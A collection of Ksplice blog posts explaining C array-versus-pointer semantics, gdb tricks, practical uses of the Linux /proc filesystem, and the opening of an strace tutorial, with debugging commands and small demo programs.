Tuesday Oct 18, 2011

The Ksplice Pointer Challenge

Back when Ksplice was just a research project at MIT, we all spent a lot of time around the student computing group, SIPB. While there, several precocious undergrads kept talking about how excited they were to take 6.828, MIT's operating systems class.

"You really need to understand pointers for this class," we cautioned them. "Reread K&R Chapter 5, again." Of course, they insisted that they understood pointers and didn't need to. So we devised a test.

Ladies and gentlemen, I hereby do officially present the Ksplice Pointer Challenge, to be answered without the use of a computer:

What does this program print?

#include <stdio.h>
int main() {
  int x[5];
  printf("%p\n", x);
  printf("%p\n", x+1);
  printf("%p\n", &x);
  printf("%p\n", &x+1);
  return 0;
}

This looks simple, but it captures a surprising amount of complexity. Let's break it down.

To make this concrete, let's assume that x is stored at address 0x7fffdfbf7f00 (this is a 64-bit system). We've hidden each entry so that you have to click to make it appear -- I'd encourage you to think about what the line should output, before revealing the answer.

printf("%p\n", x);
What will this print?

Well, x is an array, right? You're no stranger to array syntax: x[i] accesses the ith element of x.

If we search back in the depths of our memory, we remember that x[i] can be rewritten as *(x+i). For that to work, x must be the memory location of the start of the array.

Result: printf("%p\n", x) prints 0x7fffdfbf7f00. Alright.

printf("%p\n", x+1);
What will this print?

So, x is 0x7fffdfbf7f00, and therefore x+1 should be 0x7fffdfbf7f01, right?

You're not fooled. You remember that  in C, pointer arithmetic is special and magical. If you have a pointer p to an int, p+1 actually adds sizeof(int)to p. It turns out that we need this behavior if *(x+i) is properly going to end up pointing us at the right place -- we need to move over enough to pass one entry in the array. In this case, sizeof(int) is 4.

Result: printf("%p\n", x) prints 0x7fffdfbf7f04. So far so good.

printf("%p\n", &x);
What will this print?

Well, let's see. & basically means "the address of", so this is like asking "Where does x live in memory?" We answered that earlier, didn't we? x lives at 0x7fffdfbf7f00, so that's what this should print.

But hang on a second... if &x is 0x7fffdfbf7f00, that means that it lives at 0x7fffdfbf7f00. But when we print x, we also get 0x7fffdfbf7f00. So x == &x.

How can that possibly work? If x is a pointer that lives at 0x7fffdfbf7f00, and also points to 0x7fffdfbf7f00, where is the actual array stored?

Thinking about that, I draw a picture like this:


That can't be right.

So what's really going on here? Well, first off, anyone who ever told you that a pointer and an array were the same thing was lying to you. That's our fallacy here. If x were a pointer, and x == &x, then yes, we would have something like the picture above. But x isn't a pointer -- x is an array!

And it turns out that in certain situations, an array can automatically "decay" into a pointer. Into &x[0], to be precise. That's what's going on in examples 1 and 2. But not here. So &x does indeed print the address of x.

Result: printf("%p\n", &x) prints 0x7fffdfbf7f00.

Aside: what is the type of &x[0]? Well, x[0] is an int, so &x[0] is "pointer to int". That feels right.

printf("%p\n", &x+1);
What will this print?

Ok, now for the coup de grace. x may be an array, but &x is definitely a pointer. So what's &x+1?

First, another aside: what is the type of &x? Well... &x is a pointer to an array of 5 ints. How would you declare something like that?

Let's fire up cdecl and find out:

cdecl> declare y as array 5 of int;
int y[5]
cdecl> declare y as pointer to array 5 of int;
int (*y)[5]

Confusing syntax, but it works:
int (*y)[5] = &x; compiles without error and works the way you'd expect.

But back to the question at hand. Pointer arithmetic tells us that &x+1 is going to be the address of x + sizeof(x). What's sizeof(x)? Well, it's an array of 5 ints. On this system, each int is 4 bytes, so it should be 20 bytes, or 0x14.

Result &x+1 prints 0x7fffdfbf7f14.

And thus concludes the Ksplice pointer challenge.

What's the takeaway? Arrays are not pointers (though they sometimes pretend to be!). More generally, C is subtle. Oh, and 6.828 students, if you're having trouble with Lab 5, it's probably because of a bug in your Lab 2.


P.S. If you're interested in hacking on low-level systems at a place where your backwards-and-forwards knowledge of C semantics will be more than just an awesome party trick, we're looking to hire kernel hackers for the Ksplice team.

We're based in beautiful Cambridge, Mass., though working remotely is definitely an option. Send me an email at waseem.daher@oracle.com with a resume and/or a github link if you're interested!

Monday Jan 24, 2011

8 gdb tricks you should know

Despite its age, gdb remains an amazingly versatile and flexible tool, and mastering it can save you huge amounts of time when trying to debug problems in your code. In this post, I'll share 10 tips and tricks for using GDB to debug most efficiently.

I'll be using the Linux kernel for examples throughout this post, not because these examples are necessarily realistic, but because it's a large C codebase that I know and that anyone can download and take a look at. Don't worry if you aren't familiar with Linux's source in particular -- the details of the examples won't matter too much.

  1. break WHERE if COND

    If you've ever used gdb, you almost certainly know about the "breakpoint" command, which lets you break at some specified point in the debugged program.

    But did you know that you can set conditional breakpoints? If you add if CONDITION to a breakpoint command, you can include an expression to be evaluated whenever the program reaches that point, and the program will only be stopped if the condition is fulfilled. Suppose I was debugging the Linux kernel and wanted to stop whenever init got scheduled. I could do:

    (gdb) break context_switch if next == init_task
    

    Note that the condition is evaluated by gdb, not by the debugged program, so you still pay the cost of the target stopping and switching to gdb every time the breakpoint is hit. As such, they still slow the target down in relation to to how often the target location is hit, not how often the condition is met.

  2. command

    In addition to conditional breakpoints, the command command lets you specify commands to be run every time you hit a breakpoint. This can be used for a number of things, but one of the most basic is to augment points in a program to include debug output, without having to recompile and restart the program. I could get a minimal log of every mmap() operation performed on a system using:

    (gdb) b do_mmap_pgoff 
    Breakpoint 1 at 0xffffffff8111a441: file mm/mmap.c, line 940.
    (gdb) command 1
    Type commands for when breakpoint 1 is hit, one per line.
    End with a line saying just "end".
    >print addr
    >print len
    >print prot
    >end
    (gdb)
    
  3. gdb --args

    This one is simple, but a huge timesaver if you didn't know it. If you just want to start a program under gdb, passing some arguments on the command line, you can just build your command-line like usual, and then put "gdb --args" in front to launch gdb with the target program and the argument list both set:

    [~]$ gdb --args pizzamaker --deep-dish --toppings=pepperoni
    ...
    (gdb) show args
    Argument list to give program being debugged when it is started is
      " --deep-dish --toppings=pepperoni".
    (gdb) b main
    Breakpoint 1 at 0x45467c: file oven.c, line 123.
    (gdb) run
    ...
    

    I find this especially useful if I want to debug a project that has some arcane wrapper script that assembles lots of environment variables and possibly arguments before launching the actual binary (I'm looking at you, libtool). Instead of trying to replicate all that state and then launch gdb, simply make a copy of the wrapper, find the final "exec" call or similar, and add "gdb --args" in front.

  4. Finding source files

    I run Ubuntu, so I can download debug symbols for most of the packages on my system from ddebs.ubuntu.com, and I can get source using apt-get source. But how do I tell gdb to put the two together? If the debug symbols include relative paths, I can use gdb's directory command to add the source directory to my source path:

    [~/src]$ apt-get source coreutils
    [~/src]$ sudo apt-get install coreutils-dbgsym
    [~/src]$ gdb /bin/ls
    GNU gdb (GDB) 7.1-ubuntu
    (gdb) list main
    1192    ls.c: No such file or directory.
        in ls.c
    (gdb) directory ~/src/coreutils-7.4/src/
    Source directories searched: /home/nelhage/src/coreutils-7.4:$cdir:$cwd
    (gdb) list main
    1192        }
    1193    }
    1194    
    1195    int
    1196    main (int argc, char **argv)
    1197    {
    1198      int i;
    1199      struct pending *thispend;
    1200      int n_files;
    1201
    

    Sometimes, however, debug symbols end up with absolute paths, such as the kernel's. In that case, I can use set substitute-path to tell gdb how to translate paths:

    [~/src]$ apt-get source linux-image-2.6.32-25-generic
    [~/src]$ sudo apt-get install linux-image-2.6.32-25-generic-dbgsym
    [~/src]$ gdb /usr/lib/debug/boot/vmlinux-2.6.32-25-generic 
    (gdb) list schedule
    5519    /build/buildd/linux-2.6.32/kernel/sched.c: No such file or directory.
        in /build/buildd/linux-2.6.32/kernel/sched.c
    (gdb) set substitute-path /build/buildd/linux-2.6.32 /home/nelhage/src/linux-2.6.32/
    (gdb) list schedule
    5519    
    5520    static void put_prev_task(struct rq *rq, struct task_struct *p)
    5521    {
    5522        u64 runtime = p->se.sum_exec_runtime - p->se.prev_sum_exec_runtime;
    5523    
    5524        update_avg(&p->se.avg_running, runtime);
    5525    
    5526        if (p->state == TASK_RUNNING) {
    5527            /*
    5528             * In order to avoid avg_overlap growing stale when we are
    
  5. Debugging macros

    One of the standard reasons almost everyone will tell you to prefer inline functions over macros is that debuggers tend to be better at dealing with inline functions. And in fact, by default, gdb doesn't know anything at all about macros, even when your project was built with debug symbols:

    (gdb) p GFP_ATOMIC
    No symbol "GFP_ATOMIC" in current context.
    (gdb) p task_is_stopped(&init_task)
    No symbol "task_is_stopped" in current context.
    

    However, if you're willing to tell GCC to generate debug symbols specifically optimized for gdb, using -ggdb3, it can preserve this information:

    $ make KCFLAGS=-ggdb3
    ...
    (gdb) break schedule
    (gdb) continue
    (gdb) p/x GFP_ATOMIC
    $1 = 0x20
    (gdb) p task_is_stopped_or_traced(init_task)
    $2 = 0
    

    You can also use the macro and info macro commands to work with macros from inside your gdb session:

    (gdb) macro expand task_is_stopped_or_traced(init_task)
    expands to: ((init_task->state & (4 | 8)) != 0)
    (gdb) info macro task_is_stopped_or_traced
    Defined at include/linux/sched.h:218
      included at include/linux/nmi.h:7
      included at kernel/sched.c:31
    #define task_is_stopped_or_traced(task) ((task->state & (__TASK_STOPPED | __TASK_TRACED)) != 0)
    

    Note that gdb actually knows which contexts macros are and aren't visible, so when you have the program stopped inside some function, you can only access macros visible at that point. (You can see that the "included at" lines above show you through exactly what path the macro is visible).

  6. gdb variables

    Whenever you print a variable in gdb, it prints this weird $NN = before it in the output:

    (gdb) p 5+5
    $1 = 10
    

    This is actually a gdb variable, that you can use to reference that same variable any time later in your session:

    (gdb) p $1
    $2 = 10
    

    You can also assign your own variables for convenience, using set:

    (gdb) set $foo = 4
    (gdb) p $foo
    $3 = 4
    

    This can be useful to grab a reference to some complex expression or similar that you'll be referencing many times, or, for example, for simplicity in writing a conditional breakpoint (see tip 1).

  7. Register variables

    In addition to the numeric variables, and any variables you define, gdb exposes your machine's registers as pseudo-variables, including some cross-architecture aliases for common ones, like $sp for the the stack pointer, or $pc for the program counter or instruction pointer.

    These are most useful when debugging assembly code or code without debugging symbols. Combined with a knowledge of your machine's calling convention, for example, you can use these to inspect function parameters:

    (gdb) break write if $rsi == 2
    

    will break on all writes to stderr on amd64, where the $rsi register is used to pass the first parameter.

  8. The x command

    Most people who've used gdb know about the print or p command, because of its obvious name, but I've been surprised how many don't know about the power of the x command.

    x (for "examine") is used to output regions of memory in various formats. It takes two arguments in a slightly unusual syntax:

    x/FMT ADDRESS
    

    ADDRESS, unsurprisingly, is the address to examine; It can be an arbitrary expression, like the argument to print.

    FMT controls how the memory should be dumped, and consists of (up to) three components:

    • A numeric COUNT of how many elements to dump
    • A single-character FORMAT, indicating how to interpret and display each element
    • A single-character SIZE, indicating the size of each element to display.

    x displays COUNT elements of length SIZE each, starting from ADDRESS, formatting them according to the FORMAT.

    There are many valid "format" arguments; help x in gdb will give you the full list, so here's my favorites:

    x/x displays elements in hex, x/d displays them as signed decimals, x/c displays characters, x/i disassembles memory as instructions, and x/s interprets memory as C strings.

    The SIZE argument can be one of: b, h, w, and g, for one-, two-, four-, and eight-byte blocks, respectively.

    If you have debug symbols so that GDB knows the types of everything you might want to inspect, p is usually a better choice, but if not, x is invaluable for taking a look at memory.

    [~]$ grep saved_command /proc/kallsyms
    ffffffff81946000 B saved_command_line
    
    
    (gdb) x/s 0xffffffff81946000
    ffffffff81946000 <>:     "root=/dev/sda1 quiet"
    

    x/i is invaluable as a quick way to disassemble memory:

    (gdb) x/5i schedule
       0xffffffff8154804a <schedule>:   push   %rbp
       0xffffffff8154804b <schedule+1>: mov    $0x11ac0,%rdx
       0xffffffff81548052 <schedule+8>: mov    %gs:0xb588,%rax
       0xffffffff8154805b <schedule+17>:    mov    %rsp,%rbp
       0xffffffff8154805e <schedule+20>:    push   %r15
    

    If I'm stopped at a segfault in unknown code, one of the first things I try is something like x/20i $ip-40, to get a look at what the code I'm stopped at looks like.

    A quick-and-dirty but surprisingly effective way to debug memory leaks is to let the leak grow until it consumes most of a program's memory, and then attach gdb and just x random pieces of memory. Since the leaked data is using up most of memory, you'll usually hit it pretty quickly, and can try to interpret what it must have come from.

~nelhage

Ksplice is hiring!

Do you love tinkering with, exploring, and debugging Linux systems? Does writing Python clones of your favorite childhood computer games sound like a fun weekend project? Have you ever told a joke whose punch line was a git command?

Join Ksplice and work on technology that most people will tell you is impossible: updating the Linux kernel while it is running.

Help us develop the software and infrastructure to bring rebootless kernel updates to Linux, as well as new operating system kernels and other parts of the software stack. We're hiring backend, frontend, and kernel engineers. Say hello at jobs@ksplice.com!

Monday Jan 10, 2011

Solving problems with proc

The Linux kernel exposes a wealth of information through the proc special filesystem. It's not hard to find an encyclopedic reference about proc. In this article I'll take a different approach: we'll see how proc tricks can solve a number of real-world problems. All of these tricks should work on a recent Linux kernel, though some will fail on older systems like RHEL version 4.

Almost all Linux systems will have the proc filesystem mounted at /proc. If you look inside this directory you'll see a ton of stuff:

keegan@lyle$ mount | grep ^proc
proc on /proc type proc (rw,noexec,nosuid,nodev)
keegan@lyle$ ls /proc
1      13     23     29672  462        cmdline      kcore         self
10411  13112  23842  29813  5          cpuinfo      keys          slabinfo
...
12934  15260  26317  4      bus        irq          partitions    zoneinfo
12938  15262  26349  413    cgroups    kallsyms     sched_debug

These directories and files don't exist anywhere on disk. Rather, the kernel generates the contents of /proc as you read it. proc is a great example of the UNIX "everything is a file" philosophy. Since the Linux kernel exposes its internal state as a set of ordinary files, you can build tools using basic shell scripting, or any other programming environment you like. You can also change kernel behavior by writing to certain files in /proc, though we won't discuss this further.

Each process has a directory in /proc, named by its numerical process identifier (PID). So for example, information about init (PID 1) is stored in /proc/1. There's also a symlink /proc/self, which each process sees as pointing to its own directory:

keegan@lyle$ ls -l /proc/self
lrwxrwxrwx 1 root root 64 Jan 6 13:22 /proc/self -> 13833

Here we see that 13833 was the PID of the ls process. Since ls has exited, the directory /proc/13883 will have already vanished, unless your system reused the PID for another process. The contents of /proc are constantly changing, even in response to your queries!

Back from the dead

It's happened to all of us. You hit the up-arrow one too many times and accidentally wiped out that really important disk image.

keegan@lyle$ rm hda.img

Time to think fast! Luckily you were still computing its checksum in another terminal. And UNIX systems won't actually delete a file on disk while the file is in use. Let's make sure our file stays "in use" by suspending md5sum with control-Z:

keegan@lyle$ md5sum hda.img
^Z
[1]+  Stopped                 md5sum hda.img

The proc filesystem contains links to a process's open files, under the fd subdirectory. We'll get the PID of md5sum and try to recover our file:

keegan@lyle$ jobs -l
[1]+ 14595 Stopped                 md5sum hda.img
keegan@lyle$ ls -l /proc/14595/fd/
total 0
lrwx------ 1 keegan keegan 64 Jan 6 15:05 0 -> /dev/pts/18
lrwx------ 1 keegan keegan 64 Jan 6 15:05 1 -> /dev/pts/18
lrwx------ 1 keegan keegan 64 Jan 6 15:05 2 -> /dev/pts/18
lr-x------ 1 keegan keegan 64 Jan 6 15:05 3 -> /home/keegan/hda.img (deleted)
keegan@lyle$ cp /proc/14595/fd/3 saved.img
keegan@lyle$ du -h saved.img
320G    saved.img

Disaster averted, thanks to proc. There's one big caveat: making a full byte-for-byte copy of the file could require a lot of time and free disk space. In theory this isn't necessary; the file still exists on disk, and we just need to make a new name for it (a hardlink). But the ln command and associated system calls have no way to name a deleted file. On FreeBSD we could use fsdb, but I'm not aware of a similar tool for Linux. Suggestions are welcome!

Redirect harder

Most UNIX tools can read from standard input, either by default or with a specified filename of "-". But sometimes we have to use a program which requires an explicitly named file. proc provides an elegant workaround for this flaw.

A UNIX process refers to its open files using integers called file descriptors. When we say "standard input", we really mean "file descriptor 0". So we can use /proc/self/fd/0 as an explicit name for standard input:

keegan@lyle$ cat crap-prog.py 
import sys
print file(sys.argv[1]).read()
keegan@lyle$ echo hello | python crap-prog.py 
IndexError: list index out of range
keegan@lyle$ echo hello | python crap-prog.py -
IOError: [Errno 2] No such file or directory: '-'
keegan@lyle$ echo hello | python crap-prog.py /proc/self/fd/0
hello

This also works for standard output and standard error, on file descriptors 1 and 2 respectively. This trick is useful enough that many distributions provide symlinks at /dev/stdin, etc.

There are a lot of possibilities for where /proc/self/fd/0 might point:

keegan@lyle$ ls -l /proc/self/fd/0
lrwx------ 1 keegan keegan 64 Jan  6 16:00 /proc/self/fd/0 -> /dev/pts/6
keegan@lyle$ ls -l /proc/self/fd/0 < /dev/null
lr-x------ 1 keegan keegan 64 Jan  6 16:00 /proc/self/fd/0 -> /dev/null
keegan@lyle$ echo | ls -l /proc/self/fd/0
lr-x------ 1 keegan keegan 64 Jan  6 16:00 /proc/self/fd/0 -> pipe:[9159930]

In the first case, stdin is the pseudo-terminal created by my screen session. In the second case it's redirected from a different file. In the third case, stdin is an anonymous pipe. The symlink target isn't a real filename, but proc provides the appropriate magic so that we can read the file anyway. The filesystem nodes for anonymous pipes live in the pipefs special filesystem — specialer than proc, because it can't even be mounted.

The phantom progress bar

Say we have some program which is slowly working its way through an input file. We'd like a progress bar, but we already launched the program, so it's too late for pv.

Alongside /proc/$PID/fd we have /proc/$PID/fdinfo, which will tell us (among other things) a process's current position within an open file. Let's use this to make a little script that will attach a progress bar to an existing process:

keegan@lyle$ cat phantom-progress.bash
#!/bin/bash
fd=/proc/$1/fd/$2
fdinfo=/proc/$1/fdinfo/$2
name=$(readlink $fd)
size=$(wc -c $fd | awk '{print $1}')
while [ -e $fd ]; do
  progress=$(cat $fdinfo | grep ^pos | awk '{print $2}')
  echo $((100*$progress / $size))
  sleep 1
done | dialog --gauge "Progress reading $name" 7 100

We pass the PID and a file descriptor as arguments. Let's test it:

keegan@lyle$ cat slow-reader.py 
import sys
import time
f = file(sys.argv[1], 'r')
while f.read(1024):
  time.sleep(0.01)
keegan@lyle$ python slow-reader.py bigfile &
[1] 18589
keegan@lyle$ ls -l /proc/18589/fd
total 0
lrwx------ 1 keegan keegan 64 Jan  6 16:40 0 -> /dev/pts/16
lrwx------ 1 keegan keegan 64 Jan  6 16:40 1 -> /dev/pts/16
lrwx------ 1 keegan keegan 64 Jan  6 16:40 2 -> /dev/pts/16
lr-x------ 1 keegan keegan 64 Jan  6 16:40 3 -> /home/keegan/bigfile
keegan@lyle$ ./phantom-progress.bash 18589 3

And you should see a nice curses progress bar, courtesy of dialog. Or replace dialog with gdialog and you'll get a GTK+ window.

Chasing plugins

A user comes to you with a problem: every so often, their instance of Enterprise FooServer will crash and burn. You read up on Enterprise FooServer and discover that it's a plugin-riddled behemoth, loading dozens of shared libraries at startup. Loading the wrong library could very well cause mysterious crashing.

The exact set of libraries loaded will depend on the user's config files, as well as environment variables like LD_PRELOAD and LD_LIBRARY_PATH. So you ask the user to start fooserver exactly as they normally do. You get the process's PID and dump its memory map:

keegan@lyle$ cat /proc/21637/maps
00400000-00401000 r-xp 00000000 fe:02 475918             /usr/bin/fooserver
00600000-00601000 rw-p 00000000 fe:02 475918             /usr/bin/fooserver
02519000-0253a000 rw-p 00000000 00:00 0                  [heap]
7ffa5d3c5000-7ffa5d3c6000 r-xp 00000000 fe:02 1286241    /usr/lib/foo-1.2/libplugin-bar.so
7ffa5d3c6000-7ffa5d5c5000 ---p 00001000 fe:02 1286241    /usr/lib/foo-1.2/libplugin-bar.so
7ffa5d5c5000-7ffa5d5c6000 rw-p 00000000 fe:02 1286241    /usr/lib/foo-1.2/libplugin-bar.so
7ffa5d5c6000-7ffa5d5c7000 r-xp 00000000 fe:02 1286243    /usr/lib/foo-1.3/libplugin-quux.so
7ffa5d5c7000-7ffa5d7c6000 ---p 00001000 fe:02 1286243    /usr/lib/foo-1.3/libplugin-quux.so
7ffa5d7c6000-7ffa5d7c7000 rw-p 00000000 fe:02 1286243    /usr/lib/foo-1.3/libplugin-quux.so
7ffa5d7c7000-7ffa5d91f000 r-xp 00000000 fe:02 4055115    /lib/libc-2.11.2.so
7ffa5d91f000-7ffa5db1e000 ---p 00158000 fe:02 4055115    /lib/libc-2.11.2.so
7ffa5db1e000-7ffa5db22000 r--p 00157000 fe:02 4055115    /lib/libc-2.11.2.so
7ffa5db22000-7ffa5db23000 rw-p 0015b000 fe:02 4055115    /lib/libc-2.11.2.so
7ffa5db23000-7ffa5db28000 rw-p 00000000 00:00 0 
7ffa5db28000-7ffa5db2a000 r-xp 00000000 fe:02 4055114    /lib/libdl-2.11.2.so
7ffa5db2a000-7ffa5dd2a000 ---p 00002000 fe:02 4055114    /lib/libdl-2.11.2.so
7ffa5dd2a000-7ffa5dd2b000 r--p 00002000 fe:02 4055114    /lib/libdl-2.11.2.so
7ffa5dd2b000-7ffa5dd2c000 rw-p 00003000 fe:02 4055114    /lib/libdl-2.11.2.so
7ffa5dd2c000-7ffa5dd4a000 r-xp 00000000 fe:02 4055128    /lib/ld-2.11.2.so
7ffa5df26000-7ffa5df29000 rw-p 00000000 00:00 0 
7ffa5df46000-7ffa5df49000 rw-p 00000000 00:00 0 
7ffa5df49000-7ffa5df4a000 r--p 0001d000 fe:02 4055128    /lib/ld-2.11.2.so
7ffa5df4a000-7ffa5df4b000 rw-p 0001e000 fe:02 4055128    /lib/ld-2.11.2.so
7ffa5df4b000-7ffa5df4c000 rw-p 00000000 00:00 0 
7fffedc07000-7fffedc1c000 rw-p 00000000 00:00 0          [stack]
7fffedcdd000-7fffedcde000 r-xp 00000000 00:00 0          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0  [vsyscall]

That's a serious red flag: fooserver is loading the bar plugin from FooServer version 1.2 and the quux plugin from FooServer version 1.3. If the versions aren't binary-compatible, that might explain the mysterious crashes. You can now hassle the user for their config files and try to fix the problem.

Just for fun, let's take a closer look at what the memory map means. Right away, we can recognize a memory address range (first column), a filename (last column), and file-like permission bits rwx. So each line indicates that the contents of a particular file are available to the process at a particular range of addresses with a particular set of permissions. For more details, see the proc manpage.

The executable itself is mapped twice: once for executing code, and once for reading and writing data. The same is true of the shared libraries. The flag p indicates a private mapping: changes to this memory area will not be shared with other processes, or saved to disk. We certainly don't want the global variables in a shared library to be shared by every process which loads that library. If you're wondering, as I was, why some library mappings have no access permissions, see this glibc source comment. There are also a number of "anonymous" mappings lacking filenames; these exist in memory only. An allocator like malloc can ask the kernel for such a mapping, then parcel out this storage as the application requests it.

The last two entries are special creatures which aim to reduce system call overhead. At boot time, the kernel will determine the fastest way to make a system call on your particular CPU model. It builds this instruction sequence into a little shared library in memory, and provides this virtual dynamic shared object (named vdso) for use by userspace code. Even so, the overhead of switching to the kernel context should be avoided when possible. Certain system calls such as gettimeofday are merely reading information maintained by the kernel. The kernel will store this information in the public virtual system call page (named vsyscall), so that these "system calls" can be implemented entirely in userspace.

Counting interruptions

We have a process which is taking a long time to run. How can we tell if it's CPU-bound or IO-bound?

When a process makes a system call, the kernel might let a different process run for a while before servicing the request. This voluntary context switch is especially likely if the system call requires waiting for some resource or event. If a process is only doing pure computation, it's not making any system calls. In that case, the kernel uses a hardware timer interrupt to eventually perform a nonvoluntary context switch.

The file /proc/$PID/status has fields labeled voluntary_ctxt_switches and nonvoluntary_ctxt_switches showing how many of each event have occurred. Let's try our slow reader process from before:

keegan@lyle$ python slow-reader.py bigfile &
[1] 15264
keegan@lyle$ watch -d -n 1 'cat /proc/15264/status | grep ctxt_switches'

You should see mostly voluntary context switches. Our program calls into the kernel in order to read or sleep, and the kernel can decide to let another process run for a while. We could use strace to see the individual calls. Now let's try a tight computational loop:

keegan@lyle$ cat tightloop.c
int main() {
  while (1) {
  }
}
keegan@lyle$ gcc -Wall -o tightloop tightloop.c
keegan@lyle$ ./tightloop &
[1] 30086
keegan@lyle$ watch -d -n 1 'cat /proc/30086/status | grep ctxt_switches'

You'll see exclusively nonvoluntary context switches. This program isn't making system calls; it just spins the CPU until the kernel decides to let someone else have a turn. Don't forget to kill this useless process!

Staying ahead of the OOM killer

The Linux memory subsystem has a nasty habit of making promises it can't keep. A userspace program can successfully allocate as much memory as it likes. The kernel will only look for free space in physical memory once the program actually writes to the addresses it allocated. And if the kernel can't find enough space, a component called the OOM killer will use an ad-hoc heuristic to choose a victim process and unceremoniously kill it.

Needless to say, this feature is controversial. The kernel has no reliable idea of who's actually responsible for consuming the machine's memory. The victim process may be totally innocent. You can disable memory overcommitting on your own machine, but there's inherent risk in breaking assumptions that processes make — even when those assumptions are harmful.

As a less drastic step, let's keep an eye on the OOM killer so we can predict where it might strike next. The victim process will be the process with the highest "OOM score", which we can read from /proc/$PID/oom_score:

keegan@lyle$ cat oom-scores.bash
#!/bin/bash
for procdir in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+'); do
  printf "%10d %6d %s\n" \
    "$(cat $procdir/oom_score)" \
    "$(basename $procdir)" \
    "$(cat $procdir/cmdline | tr '\0' ' ' | head -c 100)"
done 2>/dev/null | sort -nr | head -n 20

For each process we print the OOM score, the PID (obtained from the directory name) and the process's command line. proc provides string arrays in NULL-delimited format, which we convert using tr. It's important to suppress error output using 2>/dev/null because some of the processes found by find (including find itself) will no longer exist within the loop. Let's see the results:

keegan@lyle$ ./oom-scores.bash 
  13647872  15439 /usr/lib/chromium-browser/chromium-browser --type=plugin
   1516288  15430 /usr/lib/chromium-browser/chromium-browser --type=gpu-process
   1006592  13204 /usr/lib/nspluginwrapper/i386/linux/npviewer.bin --plugin
    687581  15264 /usr/lib/chromium-browser/chromium-browser --type=zygote
    445352  14323 /usr/lib/chromium-browser/chromium-browser --type=renderer
    444930  11255 /usr/lib/chromium-browser/chromium-browser --type=renderer
...

Unsurprisingly, my web browser and Flash plugin are prime targets for the OOM killer. But the rankings might change if some runaway process caused an actual out-of-memory condition. Let's (carefully!) run a program that will (slowly!) eat 500 MB of RAM:

keegan@lyle$ cat oomnomnom.c
#include <unistd.h>
#include <string.h>
#include <sys/mman.h>
#define SIZE (10*1024*1024)

int main() {
  int i;
  for (i=0; i<50; i++) {
    void *m = mmap(NULL, SIZE, PROT_WRITE,
      MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
    memset(m, 0x80, SIZE);
    sleep(1);
  }
  return 0;
}

On each loop iteration, we ask for 10 megabytes of memory as a private, anonymous (non-file-backed) mapping. We then write to this region, so that the kernel will have to allocate some physical RAM. Now we'll watch OOM scores and free memory as this program runs:

keegan@lyle$ gcc -Wall -o oomnomnom oomnomnom.c
keegan@lyle$ ./oomnomnom &
[1] 19697
keegan@lyle$ watch -d -n 1 './oom-scores.bash; echo; free -m'

You'll see oomnomnom climb to the top of the list.

So we've seen a few ways that proc can help us solve problems. Actually, we've only scratched the surface. Inside each process's directory you'll find information about resource limits, chroots, CPU affinity, page faults, and much more. What are your favorite proc tricks? Let us know in the comments!

~keegan

Thursday Aug 05, 2010

Strace -- The Sysadmin's Microscope

Sometimes as a sysadmin the logfiles just don't cut it, and to solve a problem you need to know what's really going on. That's when I turn to strace -- the system-call tracer.

A system call, or syscall, is where a program crosses the boundary between user code and the kernel. Fortunately for us using strace, that boundary is where almost everything interesting happens in a typical program.

The two basic jobs of a modern operating system are abstraction and multiplexing. Abstraction means, for example, that when your program wants to read and write to disk it doesn't need to speak the SATA protocol, or SCSI, or IDE, or USB Mass Storage, or NFS. It speaks in a single, common vocabulary of directories and files, and the operating system translates that abstract vocabulary into whatever has to be done with the actual underlying hardware you have. Multiplexing means that your programs and mine each get fair access to the hardware, and don't have the ability to step on each other -- which means your program can't be permitted to skip the kernel, and speak raw SATA or SCSI to the actual hardware, even if it wanted to.

So for almost everything a program wants to do, it needs to talk to the kernel. Want to read or write a file? Make the open() syscall, and then the syscalls read() or write(). Talk on the network? You need the syscalls socket(), connect(), and again read() and write(). Make more processes? First clone() (inside the standard C library function fork()), then you probably want execve() so the new process runs its own program, and you probably want to interact with that process somehow, with one of wait4(), kill(), pipe(), and a host of others. Even looking at the clock requires a system call, clock_gettime(). Every one of those system calls will show up when we apply strace to the program.

In fact, just about the only thing a process can do without making a telltale system call is pure computation -- using the CPU and RAM and nothing else. As a former algorithms person, that's what I used to think was the fun part. Fortunately for us as sysadmins, very few real-life programs spend very long in that pure realm between having to deal with a file or the network or some other part of the system, and then strace picks them up again.

Let's look at a quick example of how strace solves problems.

Use #1: Understand A Complex Program's Actual Behavior
One day, I wanted to know which Git commands take out a certain lock -- I had a script running a series of different Git commands, and it was failing sometimes when run concurrently because two commands tried to hold the lock at the same time.

Now, I love sourcediving, and I've done some Git hacking, so I spent some time with the source tree investigating this question. But this code is complex enough that I was still left with some uncertainty. So I decided to get a plain, ground-truth answer to the question: if I run "git diff", will it grab this lock?

Strace to the rescue. The lock is on a file called index.lock. Anything trying to touch the file will show up in strace. So we can just trace a command the whole way through and use grep to see if index.lock is mentioned:

$ strace git status 2>&1 >/dev/null | grep index.lock
open(".git/index.lock", O_RDWR|O_CREAT|O_EXCL, 0666) = 3
rename(".git/index.lock", ".git/index") = 0

$ strace git diff 2>&1 >/dev/null | grep index.lock
$

So git status takes the lock, and git diff doesn't.

Interlude: The Toolbox
To help make it useful for so many purposes, strace takes a variety of options to add or cut out different kinds of detail and help you see exactly what's going on.

In Medias Res, If You Want
Sometimes we don't have the luxury of starting a program over to run it under strace -- it's running, it's misbehaving, and we need to find out what's going on. Fortunately strace handles this case with ease. Instead of specifying a command line for strace to execute and trace, just pass -p PID where PID is the process ID of the process in question -- I find pstree -p invaluable for identifying this -- and strace will attach to that program, while it's running, and start telling you all about it.

Times
When I use strace, I almost always pass the -tt option. This tells me when each syscall happened -- -t prints it to the second, -tt to the microsecond. For system administration problems, this often helps a lot in correlating the trace with other logs, or in seeing where a program is spending too much time.

For performance issues, the -T option comes in handy too -- it tells me how long each individual syscall took from start to finish.

Data
By default strace already prints the strings that the program passes to and from the system -- filenames, data read and written, and so on. To keep the output readable, it cuts off the strings at 32 characters. You can see more with the -s option -- -s 1024 makes strace print up to 1024 characters for each string -- or cut out the strings entirely with -s 0.

Sometimes you want to see the full data flowing in just a few directions, without cluttering your trace with other flows of data. Here the options -e read= and -e write= come in handy.

For example, say you have a program talking to a database server, and you want to see the SQL queries, but not the voluminous data that comes back. The queries and responses go via write() and read() syscalls on a network socket to the database. First, take a preliminary look at the trace to see those syscalls in action:

$ strace -p 9026
Process 9026 attached - interrupt to quit
read(3, "\1\0\0\1\1A\0\0\2\3def\7youtomb\tartifacts\ta"..., 16384) = 116
